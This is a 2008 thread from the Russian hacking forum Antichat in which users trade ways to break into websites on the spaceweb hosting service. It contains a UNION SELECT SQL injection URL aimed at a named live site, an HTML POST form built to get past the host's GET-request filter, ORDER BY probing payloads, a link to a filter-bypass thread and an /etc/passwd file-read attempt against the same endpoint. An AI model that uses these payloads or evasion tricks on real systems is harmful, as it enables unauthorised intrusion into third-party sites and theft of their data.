Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Чёртов spaceweb (https://forum.antichat.xyz/showthread.php?t=61684)

Ponchik 13.02.2008 04:23

Чёртов spaceweb
 
Не нащёл куда нажаловаться такчто пишу сюда :D

В общем сайты которые висят на этом хостинге никак неполучается сломать, чуть что-то нетак в SQL запросе и кадает на http://2.sweb.ru/insecure :mad: Я ваще думал что обойти никак низя, но нащёл сайт с SQL inj висящий на этом хостинге и задефейсеный :confused: МБ другая дыра там была, но я склоняюсь к скуле... В общем вот дырко
Код:

http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()/*
если прописать from+table/* ... ну сами в общем пасмарите... Вопрос по хостингу, как обойти эту сраную фильтрацию, или как это назвать :(
Возможно-ли это ваще...

it's my 13.02.2008 04:58

Анти-Фильтрация или Обход фильтрации запрещенных слов в MySQL:
https://forum.antichat.ru/thread56409-sweb.html

Ponchik 13.02.2008 06:59

Ёлки, sweb... Я всё рыл на spaceweb =\
Спасибо

Scipio 13.02.2008 07:00

это не там где только гет фильтруеЦЦо

it's my, гы твой пост не посмотрел...

Ponchik 13.02.2008 07:14

Эх! Прочитал я тему и был уверен что всё получится... А нет...
Навоял такую форму
Код:

<form method="post" action="http://www.flotov.net/log.php">
<input name="id" type="text" size="200"><br>
<input type="submit">
</form>

Взял существующий ID http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358 и вбил
Код:

bdc26a63b13ccabfd478f160e46da358
в поле, норм, сработало, тогда вбил
Код:

bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/*
не сработало, а так работает
Код:

http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/*
Пробовал пару разных вариантов, 0 :(

[Update]
Щас подумал, мб вы имеете в виду
Код:

<form method="post" action="http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()+FROM+Users/*">
Но нет, редирект :mad:
P.S. Я звеняюсь, но я сваливаю спать, буду вечером :o

Spyder 13.02.2008 13:51

http://mebel.org.ua/cgi-bin/post.php

Всё нормально работает, только вот таблицы не подобрал

Spyder 13.02.2008 14:10

http://www.flotov.net/log.php?id=/etc/passwd

:D

Ponchik 13.02.2008 15:59

Пилять, и в чём была моя ошибка, почему у меня не получалось? :mad:


Время: 09:26